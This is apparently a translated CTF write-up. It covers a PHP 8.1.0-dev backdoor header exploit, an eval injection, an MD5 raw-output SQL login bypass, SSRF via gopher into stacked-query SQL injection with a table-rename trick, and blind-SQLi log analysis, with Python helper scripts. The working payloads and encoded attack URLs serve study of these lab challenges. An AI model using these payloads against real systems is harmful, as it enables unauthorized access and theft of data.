Contents
- Web
- Check-in
- unsetme
- “慢慢做” management system
- Misc
- Can you do log analysis?
- sectraffic
Web
Check-in


http://cn-sec.com/archives/313267.html
The check-in challenge runs the backdoored PHP 8.1.0-dev build described at the link above: when a request carries a User-Agentt header whose value begins with zerodium, the server hands the rest of the value to eval(), so a single header reads the flag:
User-Agentt: zerodiumsystem("cat /flag");

unsetme

Setting this one aside for now; the payload that worked:
/?a=:[]);eval($_GET[1]);//&1=system(%27cat%20/flag%27);

“慢慢做” management system


Going by the challenge hint, the first step, the login, should exploit the fact that certain strings, once passed through md5($string, true), turn into raw bytes like the ones below. The 16 raw digest bytes are concatenated straight into the SQL string, so when they contain 'or' followed by a non-zero digit the password condition becomes password=''or'6...' and MySQL evaluates it as true, which is the injection:
PS C:\Users\Administrator\Downloads> php -r "var_dump(md5('ffifdyop',true));"
Command line code:1:
string(16) "'or'6�]��!r,��b"
PS C:\Users\Administrator\Downloads>
Unfortunately, ffifdyop is filtered here.

So we need another string that has the same effect as ffifdyop; a search engine turns one up:
https://blog.csdn.net/March97/article/details/81222922
PS C:\Users\Administrator\Downloads> php -r "var_dump(md5('129581926211651571912466741651878684928',true));"
Command line code:1:
string(16) "�T0D��o#��'or'8"
PS C:\Users\Administrator\Downloads>
/?username=admin&password=129581926211651571912466741651878684928
Login succeeds.
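As an added example (not part of the original writeup), here is a checker for the property that makes these two strings work, plus the kind of search that finds a replacement when one candidate is blacklisted. It assumes the login query has the shape `... password='<raw md5 bytes>'` with the raw bytes concatenated unescaped, which the page implies but never shows.

```python
import hashlib


def raw_md5(s: str) -> bytes:
    """What PHP's md5($s, true) returns: the 16 raw digest bytes, not hex."""
    return hashlib.md5(s.encode()).digest()


def is_or_injection(digest: bytes) -> bool:
    """True if splicing `digest` into  ... password='<digest>'  yields
    password='' or '<N...>'  with a non-zero leading digit N.

    MySQL casts the string '<N...>' to the number it starts with, and a
    non-zero number is true, so the WHERE clause matches every row.  The
    digit must be 1-9, and no other quote or backslash may appear in the
    remaining bytes, or the literal breaks instead of closing cleanly.
    (Assumed query shape: the raw bytes are concatenated unescaped.)
    """
    i = digest.find(b"'or'")
    if i < 0 or i + 4 >= len(digest):
        return False
    if digest[i + 4] not in b"123456789":
        return False
    rest = digest[:i] + digest[i + 4:]
    return b"'" not in rest and b"\\" not in rest


def find_injecting(candidates):
    """First candidate string whose raw MD5 passes is_or_injection(), or None."""
    for cand in candidates:
        if is_or_injection(raw_md5(cand)):
            return cand
    return None


def search_numeric(start: int, count: int):
    """Scan the decimal strings start .. start+count-1.  A search of this kind
    is how alternatives such as 1295819...928 were found once ffifdyop was
    blacklisted; expect on the order of 10^10 hashes per hit, so it is a batch
    job rather than something to run inline during a contest."""
    return find_injecting(str(n) for n in range(start, start + count))


if __name__ == "__main__":
    for s in ("ffifdyop", "129581926211651571912466741651878684928", "admin"):
        print(s, raw_md5(s), is_or_injection(raw_md5(s)))
```

The check is deliberately conservative: MySQL would also accept forms such as 'or'.5, but the 'or'<digit> shape is the one both known strings use and the one a filter author is least likely to have anticipated beyond the literal ffifdyop.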

Following the challenge hint, look for admin.php on the internal network through the SSRF endpoint:
/ssrf.php?way=127.0.0.1%2Fadmin.php

Capture the admin panel's login request, tidy it into a raw request for 127.0.0.1/admin.php, and send that POST through the gopher protocol; a small Python script does the encoding:
from urllib.parse import quote

payload = "username=mochu7&password=mochu7"
# Raw HTTP request. The triple-quoted string also carries a leading newline,
# which is harmless: servers ignore empty lines before the request line.
postdata = """
POST /admin.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: {}

{}
""".format(len(payload), payload)
# Encode twice: curl percent-decodes the gopher payload once before writing it
# to the socket, and PHP decodes the ?way= query parameter once before that.
final_payload = 'gopher://127.0.0.1:80/_' + quote(quote(postdata))
print(final_payload)
print(postdata)
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252031%250A%250Ausername%253Dmochu7%2526password%253Dmochu7%250A
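As an added example (not the script above and not the challenge's own code), the same construction done more carefully: CRLF line endings, Content-Length computed from the encoded body, and form values percent-encoded so that an injection string containing quotes, semicolons, # or & reaches $_POST intact. The original script sends the body raw, which happens to work for the payloads in this writeup but breaks as soon as a payload contains & or %. The two-layer percent-encoding (one layer for curl's gopher handling, one for the ?way= query parameter) is taken from the original script; because the form values get a third, body-level layer here, the resulting URL differs from the original in that a quote appears as %252527 rather than %2527. `admin_login_request` is the builder used for the stacked-query injections that follow, with the injection placed in the username field.

```python
from urllib.parse import quote, unquote, unquote_to_bytes, urlencode


def build_http_post(host: str, path: str, form: dict) -> bytes:
    """Raw HTTP/1.1 POST with CRLF line endings and a Content-Length computed
    from the encoded body.  Form values are percent-encoded by urlencode(), so
    an injection containing  ' ; # & +  survives PHP's $_POST parsing."""
    body = urlencode(form)
    head = (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n"
        "\r\n"
    )
    return head.encode() + body.encode()


def gopher_url(host: str, port: int, raw: bytes, layers: int = 2) -> str:
    """gopher://host:port/_<payload>.  curl drops the '_' item-type byte and
    percent-decodes the rest once before writing it to the socket (layer 1).
    The URL is itself handed over in a GET parameter (?way=...), which PHP
    decodes once as well, hence the second layer (assumed from the original
    script's quote(quote(...)))."""
    enc = quote(raw, safe="")          # bytes in, ASCII-only str out
    for _ in range(layers - 1):
        enc = quote(enc, safe="")
    return f"gopher://{host}:{port}/_{enc}"


def decode_gopher(url: str, layers: int = 2) -> bytes:
    """Undo gopher_url(): the exact bytes the internal web server receives."""
    enc = url.split("/_", 1)[1]
    for _ in range(layers - 1):
        enc = unquote(enc)             # outer layers are pure ASCII
    return unquote_to_bytes(enc)


def content_length_matches(raw: bytes) -> bool:
    """Sanity check before sending: a wrong Content-Length makes the server
    wait for more data or truncate the injection."""
    head, _, body = raw.partition(b"\r\n\r\n")
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"content-length:"):
            return int(line.split(b":", 1)[1].strip()) == len(body)
    return False


def admin_login_request(username: str, password: str) -> str:
    """Gopher URL that POSTs a login (or a stacked-query injection placed in
    the username field) to the internal admin.php."""
    raw = build_http_post("127.0.0.1", "/admin.php",
                          {"username": username, "password": password})
    assert content_length_matches(raw)
    return gopher_url("127.0.0.1", 80, raw)


if __name__ == "__main__":
    # Same stacked query as the first injection in the writeup.
    print(admin_login_request("mochu7';show databases#", "mochu7"))
```

The value printed is what goes into /ssrf.php?way=; `decode_gopher` is useful when a payload misbehaves, because comparing its output with the intended raw request is the quickest way to spot an encoding layer too many or too few.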

That goes through. Next, test for injection by adding a single quote:
username=mochu7'&password=mochu7
It errors out immediately.

That is clearly injection. Later fuzzing showed that stacked queries go through here, and the echo looked very familiar:
username=mochu7';show databases#&password=mochu7
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252048%250A%250Ausername%253Dmochu7%2527%253Bshow%2520databases%2523%2526password%253Dmochu7%250A

Databases:
ctf
ctf2
information_schema
Keep enumerating:
username=mochu7';use ctf;show tables#&password=mochu7
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252053%250A%250Ausername%253Dmochu7%2527%253Buse%2520ctf%253Bshow%2520tables%2523%2526password%253Dmochu7%250A

username=mochu7';use ctf2;show tables#&password=mochu7
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252054%250A%250Ausername%253Dmochu7%2527%253Buse%2520ctf2%253Bshow%2520tables%2523%2526password%253Dmochu7%250A

Tables_in_ctf:
users
Tables_in_ctf2:
fake_admin
real_admin_here_do_you_find
What we want is the real admin password, so check the columns of both tables:
username=mochu7';use ctf2;show columns from `fake_admin`#&password=mochu7
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252073%250A%250Ausername%253Dmochu7%2527%253Buse%2520ctf2%253Bshow%2520columns%2520from%2520%2560fake_admin%2560%2523%2526password%253Dmochu7%250A

username=mochu7';use ctf2;show columns from `real_admin_here_do_you_find`#&password=mochu7
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252090%250A%250Ausername%253Dmochu7%2527%253Buse%2520ctf2%253Bshow%2520columns%2520from%2520%2560real_admin_here_do_you_find%2560%2523%2526password%253Dmochu7%250A

The next step should be reading the password column of real_admin_here_do_you_find, but select, handler and similar keywords are filtered, and during the contest I did not look into how to read column data that way. The challenge is clearly modelled on the earlier 強網杯 one, and I remembered its trick: rename the table you want to read (real_admin_here_do_you_find) to the name of the table the application itself queries (fake_admin), then craft an injection that makes the application's own query return rows from it:
username=mochu7';rename table fake_admin to mochu7;rename table real_admin_here_do_you_find to fake_admin#&password=mochu7
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%2520122%250A%250Ausername%253Dmochu7%2527%253Brename%2520table%2520fake_admin%2520to%2520mochu7%253Brename%2520table%2520real_admin_here_do_you_find%2520to%2520fake_admin%2523%2526password%253Dmochu7%250A

username=mochu7'or 1=1;show tables;#&password=mochu7

With fake_admin now pointing at the real table, the login's own query matches on `'or 1=1` and the page echoes the real admin password: 5fb4e07de914cfc82afb44vbaf402203
Finally, log in with the real admin account name and password:
username=admin&password=5fb4e07de914cfc82afb44vbaf402203
We are told to go to /flag.php; view the source there and carry the cookie over.


Misc
Can you do log analysis?
Log analysis of a time-based blind SQL injection

Among the probe requests for each character position, exactly one has a response size different from all the others; that request holds the correct guess for that position. A short Python script pulls the guessed byte out of each such line (the "length" is the response-size field of the access-log line, between the status code and the referer):
from base64 import b64decode

flag = ''
with open('access.log', 'r') as f:
    lines = f.readlines()

for line in lines:
    # only the probes aimed at the flag table
    if "select%20flag%20from%20flllag" in line:
        # response-size field of the combined log line: after the status,
        # before the empty referer and the python-requests User-Agent
        packet_len = line[line.find(' 200 ') + 5:line.find(' "-" "python-requests/2.21.0"')]
        if packet_len == '377':
            # the guessed byte value sits between  ))=  and  ,sleep
            ascii_code = line[line.find('))=') + 3:line.find(',sleep')]
            flag += chr(int(ascii_code))

# the recovered characters are base64 text
print(b64decode(flag).decode('utf-8'))
flag{You_are_so_great}
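A generalised version, added here and not part of the original writeup: instead of hard-coding the hit size 377 and fixed string offsets, it parses the log with regular expressions, groups probes by character position and treats the response size that differs from the overall majority as the hit, raising an error if a position has zero or several outliers rather than silently producing a wrong flag. The log format (Apache/nginx combined) and the exact probe shape `substr((select flag from flllag),<pos>,1))=<code>,sleep` are assumptions, since the page only shows fragments of the request; the sample log lines are constructed, not taken from the challenge.

```python
import base64
import re
from collections import Counter, defaultdict

# Request, status and response-size fields of a combined-format log line,
# e.g.  "GET /index.php?id=... HTTP/1.1" 200 377
LOG_RE = re.compile(
    r'"(?:GET|POST) (?P<url>\S+) HTTP/1\.[01]" (?P<status>\d{3}) (?P<size>\d+|-) ')
# Assumed probe shape (only fragments of it appear in the writeup):
#   substr((select flag from flllag),<pos>,1))=<code>,sleep
PROBE_RE = re.compile(
    r'substr\(\(select%20flag%20from%20flllag\),(?P<pos>\d+),1\)\)=(?P<code>\d+),sleep')


def parse_probes(lines):
    """Yield (position, guessed_ascii_code, response_size) per probe line."""
    for line in lines:
        m, p = LOG_RE.search(line), PROBE_RE.search(line)
        if not m or not p or m["status"] != "200":
            continue
        yield int(p["pos"]), int(p["code"]), m["size"]


def recover_chars(lines) -> str:
    """The response size seen most often is the 'wrong guess' baseline; the
    single probe per position with a different size is the correct byte."""
    probes = list(parse_probes(lines))
    if not probes:
        return ""
    baseline = Counter(size for _, _, size in probes).most_common(1)[0][0]
    hits = defaultdict(list)
    for pos, code, size in probes:
        if size != baseline:
            hits[pos].append(code)
    out = []
    for pos in range(1, max(hits) + 1):
        codes = hits.get(pos, [])
        if len(codes) != 1:
            raise ValueError(
                f"position {pos}: {len(codes)} outlier responses, expected exactly 1")
        out.append(chr(codes[0]))
    return "".join(out)


def recover_flag(lines) -> str:
    """The extracted characters are base64 text, as in the challenge."""
    return base64.b64decode(recover_chars(lines)).decode()


def make_sample_log(secret: str, baseline: int = 369, hit: int = 377):
    """Constructed sample traffic (not from the challenge): for each position
    two wrong guesses at the baseline size and the right one at another size,
    plus noise lines the filter must skip."""
    encoded = base64.b64encode(secret.encode()).decode()
    tmpl = ('10.0.0.5 - - [10/Apr/2021:10:00:00 +0800] "GET /index.php?id=1%27%20and%20if(ascii('
            'substr((select%20flag%20from%20flllag),{pos},1))={code},sleep(3),1)%23 HTTP/1.1" '
            '{status} {size} "-" "python-requests/2.21.0"')
    lines = ['10.0.0.5 - - [10/Apr/2021:09:59:59 +0800] "GET /index.php HTTP/1.1" '
             '200 369 "-" "python-requests/2.21.0"']
    for pos, ch in enumerate(encoded, start=1):
        for code in (ord(ch) - 1, ord(ch) + 1):
            lines.append(tmpl.format(pos=pos, code=code, status=200, size=baseline))
        lines.append(tmpl.format(pos=pos, code=ord(ch), status=200, size=hit))
    lines.append(tmpl.format(pos=1, code=0, status=404, size=hit))  # non-200: ignored
    return lines


if __name__ == "__main__":
    print(recover_flag(make_sample_log("flag{You_are_so_great}")))
```

On a real access.log, replace `make_sample_log(...)` with `open("access.log")`; if the attacker used a different probe template, only PROBE_RE needs adjusting.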
sectraffic
Please credit the source when reposting. Original link: https://www.uj5u.com/qita/272831.html
